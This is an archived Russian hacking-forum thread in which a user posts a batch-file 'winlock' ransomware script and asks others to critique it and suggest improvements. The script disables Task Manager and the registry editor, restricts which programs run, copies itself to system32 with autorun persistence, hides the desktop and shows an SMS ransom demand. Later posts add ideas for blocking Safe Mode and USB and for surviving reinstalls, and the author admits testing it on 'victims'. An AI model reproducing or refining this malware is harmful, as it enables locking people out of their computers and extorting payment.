Добро пожаловать! Это — архивная версия форумов на «Хакер.Ru». Она работает в режиме read-only.
 

Похоже ли сие творение в .bat на вирус winlock

Пользователи, просматривающие топик: none

Зашли как: Guest
Все форумы >> [Программы для взлома] >> Похоже ли сие творение в .bat на вирус winlock
Имя
Сообщение << Старые топики   Новые топики >>
Похоже ли сие творение в .bat на вирус winlock - 2011-02-08 17:52:04.176666   
GIGNomg

Сообщений: 21
Оценки: 0
Присоединился: 2011-01-12 16:23:44.046666
Собственно начал изучать язык cdm или .bat'ники

И вот изучя половину решил попробовать сотворить вирус winlock который блокирует Windows и просит отправить смс.
Ну вот написал,что-то подобное  в .bat'нике.
Оцени работу.И укажите ошибки и чего ещё можно добавить?


@echo off chcp 1251 reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f &gt;nul reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\RestrictRun /v 1 /t REG_DWORD /d %SystemRoot%\explorer.exe /f &gt;nul reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableRegistryTools /t REG_DWORD /d 1 /f &gt;nul copy ""%0"" "%SystemRoot%\system32\attak.bat" &gt;nul reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "attak" /t REG_SZ /d "%SystemRoot%\system32\attak.bat" /f &gt;nul reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoControlPanel /t REG_DWORD /d 1 /f &gt;nul reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoDesktop /t REG_DWORD /d 1 /f &gt;nul HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SafeBoot\ HKLM\System\CurrentControlSet\Services\UsbStor msg * "Отправте смс с текстом XXXX на номер XXXX чтобы избавиться от вируса." &gt;nul taskkill /f /im explorer.exe &gt;nul
Post #: 1
RE: Похоже ли сие творение в .bat на вирус winlock - 2011-02-09 00:58:39.450000   
xLordx

Сообщений: 608
Оценки: 0
Присоединился: 2010-05-04 17:59:11.626666
Эммм.. я конечно не спец, но, как будет выводится сообщение если explorer.exe отключен? И удалить такой "винлок" минут 5.
Post #: 2
RE: Похоже ли сие творение в .bat на вирус winlock - 2011-02-09 01:13:05.506666   
kat$

Сообщений: 28
Оценки: 0
Присоединился: 2010-12-28 21:23:27.240000
quote:

ORIGINAL: xLordx

Эммм.. я конечно не спец, но, как будет выводится сообщение если explorer.exe отключен? И удалить такой "винлок" минут 5.

Сообщение будет выводится! Согласен удалить очень просто!
Post #: 3
RE: Похоже ли сие творение в .bat на вирус winlock - 2011-02-09 14:40:01.283333   
GIGNomg

Сообщений: 21
Оценки: 0
Присоединился: 2011-01-12 16:23:44.046666
А как именно его можно удалить?
Если рабочий стол скрыт.
Диспетчер с ресстром запрещены.И + ко всем ни 1 .exe файл не запускается?
Post #: 4
RE: Похоже ли сие творение в .bat на вирус winlock - 2011-02-09 14:50:50.163333   
zolovir

Сообщений: 382
Оценки: 0
Присоединился: 2011-01-16 08:16:06.110000
Безопасный режим или LiveCD от Kaspersky или DrWeb
Post #: 5
RE: Похоже ли сие творение в .bat на вирус winlock - 2011-02-09 16:10:32.200000   
GIGNomg

Сообщений: 21
Оценки: 0
Присоединился: 2011-01-12 16:23:44.046666
Если не ошибаюсь,то если добавить эту строчку,то безопасный режим будет отключен
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SafeBoot\
А с помощью этой строки можно отключить USB
HKLM\System\CurrentControlSet\Services\UsbStor
Если есть ошибки укажите плиз
Post #: 6
RE: Похоже ли сие творение в .bat на вирус winlock - 2011-02-09 18:12:07.036666   
xLordx

Сообщений: 608
Оценки: 0
Присоединился: 2010-05-04 17:59:11.626666
Хм, если б все так было просто, то зачем все эти винлоккеры дорогие и всё остальное?)) имхо бред, не надежная такая штука будет. Попробуй протестить на дедике.
Post #: 7
RE: Похоже ли сие творение в .bat на вирус winlock - 2011-02-09 19:30:51.550000   
GIGNomg

Сообщений: 21
Оценки: 0
Присоединился: 2011-01-12 16:23:44.046666
Я тестирую на жертвах)))
У меня есть друг он любит голову ломать по поводу "Как избавиться от вируса" )

Ну ясен *уй,что настоящие winlock'и лучше. Т.к их выковыривать задолбаешься)

У меня есть знакомый.Ну так вот он написал winlock который себя и на C: и D: диски кидает.Вообще когда Windows меняешь,диск C форматнул а на D он ещё лежит.Вот когда Windows уже папочка создалась и пошли дрова,то с диска D когда уже все файлы записаны  вирь копирует себя где ему место.не даёт даже дровам установится уже выдаёт,что Windows блокирован.И пока не оплатишь,то фиг выкавырнешь).Вот чем такие зараза круче)
Post #: 8
RE: Похоже ли сие творение в .bat на вирус winlock - 2011-02-09 21:33:04.746666   
nvidiag

Сообщений: 32
Оценки: 0
Присоединился: 2010-12-05 02:21:03.993333
Но что делать, если компьютер не имеет интернет? Как его собираются отправить сообщение? через шлюз .. или ..?
Post #: 9
RE: Похоже ли сие творение в .bat на вирус winlock - 2011-02-10 15:04:49.740000   
Dimon0880

Сообщений: 5
Оценки: 0
Присоединился: 2011-02-10 14:47:16.726666
а как добавить определенный пароль при вводе которого табличка исччезнет, чтоб на себе тестить?
Post #: 10
RE: Похоже ли сие творение в .bat на вирус winlock - 2011-02-12 18:21:23.016666   
GIGNomg

Сообщений: 21
Оценки: 0
Присоединился: 2011-01-12 16:23:44.046666
Ну занят пока временные трудности.Потом замучу и напишу.

Post #: 11
RE: Похоже ли сие творение в .bat на вирус winlock - 2011-02-12 20:38:42.780000   
Dimon0880

Сообщений: 5
Оценки: 0
Присоединился: 2011-02-10 14:47:16.726666
ok.
Post #: 12
RE: Похоже ли сие творение в .bat на вирус winlock - 2011-02-12 20:50:54.386666   
shkolote attake

Сообщений: 268
Оценки: 0
Присоединился: 2010-10-19 05:37:44.873333
блин народ хватит уже людям всякие подлянки кидать….займитесь уже нормальным делом!!!
Post #: 13
RE: Похоже ли сие творение в .bat на вирус winlock - 2011-02-12 21:54:14.613333   
Alianna

Сообщений: 1922
Оценки: 356
Присоединился: 2010-03-02 11:27:12.343333
shkolote attake, вот сам занялся бы полезным делом вместо флуда на форуме…
Post #: 14
Страниц:  [1]
Все форумы >> [Программы для взлома] >> Похоже ли сие творение в .bat на вирус winlock







Связаться:
Вопросы по сайту / xakep@glc.ru

Предупреждение: использование полученных знаний в противозаконных целях преследуется по закону.